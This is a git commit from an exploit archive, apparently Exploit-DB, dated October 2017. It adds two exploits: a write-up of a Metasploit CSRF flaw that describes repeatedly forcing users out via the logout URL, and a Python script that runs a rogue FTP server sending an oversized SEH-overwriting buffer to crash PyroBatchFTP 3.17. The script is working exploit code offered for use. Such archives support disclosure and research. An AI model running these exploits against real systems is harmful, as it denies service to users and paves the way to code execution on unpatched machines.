DB: 2017-10-09

2 new exploits PyroBatchFTP 3.17 - Buffer Overflow (SEH) Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery
Bejlali · Oct 9, 2017 · 99ad37a · 99ad37a
1 parent 4e334a2
commit 99ad37a
Show file tree

Hide file tree

Showing 3 changed files with 66 additions and 0 deletions.
diff --git a/files.csv b/files.csv
@@ -5703,6 +5703,7 @@ id,file,description,date,author,platform,type,port
 42945,platforms/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",multiple,dos,0
 42946,platforms/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos,0
 42955,platforms/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",multiple,dos,0
+42962,platforms/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -38658,3 +38659,4 @@ id,file,description,date,author,platform,type,port
 42954,platforms/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",php,webapps,0
 42956,platforms/hardware/webapps/42956.txt,"NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",hardware,webapps,0
 42959,platforms/php/webapps/42959.py,"Unitrends UEB 9.1 - Privilege Escalation",2017-08-08,"Jared Arave",php,webapps,0
+42961,platforms/ruby/webapps/42961.txt,"Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",ruby,webapps,0
diff --git a/platforms/ruby/webapps/42961.txt b/platforms/ruby/webapps/42961.txt
@@ -0,0 +1,28 @@
+# Exploit Title: CSRF
+# Date: Wed, Aug 30, 2017
+# Software Link: https://www.metasploit.com/
+# Exploit Author: Dhiraj Mishra 
+# Contact: http://twitter.com/mishradhiraj_
+# Website: http://datarift.blogspot.in/
+# CVE: CVE-2017-15084 (R7-2017-22)
+# Category: Metasploit Pro, Express, Ultimate, and Community
+
+
+1. Description
+
+Metasploit Pro, Express, Ultimate, and Community can encounter an issue of cross site request forgery (also known as one-click attack and is abbreviated as CSRF or XSRF), which is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. A CSRF attack attempts to exploit the trust that a specific website has in a user's browser.
+
+2. Proof of concept
+
+The MSF did not protect the logout form with csrf token, therefore i can logout any user by sending this url https://Metasploit-Server-IP:3790/logout
+Here's an attack vector:
+
+1) Set up a honeypot that detects MSF scans/attacks (somehow).
+2) Once I get a probe, fire back a logout request.
+3) Continue to logout the active user forever.
+
+It's less damaging than a traditional "hack back" but is sure to irritate the local red team to no end. It's essentially a user DoS. This attack may have been useful as a denial of service against Metasploit instances, allowing an attacker to prevent normal Metasploit usage.
+
+3. Rapid7 Security Bulletin
+
+https://blog.rapid7.com/2017/10/06/vulnerabilities-affecting-four-rapid7-products-fixed/
diff --git a/platforms/windows/dos/42962.py b/platforms/windows/dos/42962.py
@@ -0,0 +1,36 @@
+#!/usr/bin/python
+
+print "PyroBatchFTP Local Buffer Overflow (SEH) Server"
+
+#Author: Kevin McGuigan @_h3xagram
+#Author Website: https://www.7elements.co.uk
+#Vendor Website: https://www.emtech.com
+#Date: 07/10/2017
+#Version: 3.17
+#Tested on: Windows 7 32-bit
+#CVE: CVE-2017-15035
+
+
+import socket
+import sys
+
+buffer="A" * 2292 + "B" * 4 + "C" * 4 + "D" * 800
+port = 21
+
+try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind(("0.0.0.0", port))
+ s.listen(5)
+ print("[+] FTP server started on port: "+str(port)+"\r\n")
+except:
+ print("[+] Failed to bind the server to port: "+str(port)+"\r\n")
+
+while True:
+ conn, addr = s.accept()
+ conn.send('220 Welcome to PyoBatchFTP Overflow!\r\n')
+ print(conn.recv(1024))
+ conn.send("331 OK\r\n")
+ print(conn.recv(1024))
+ conn.send('230 OK\r\n')
+ print(conn.recv(1024))
+ conn.send('220 "'+buffer+'" is current directory\r\n')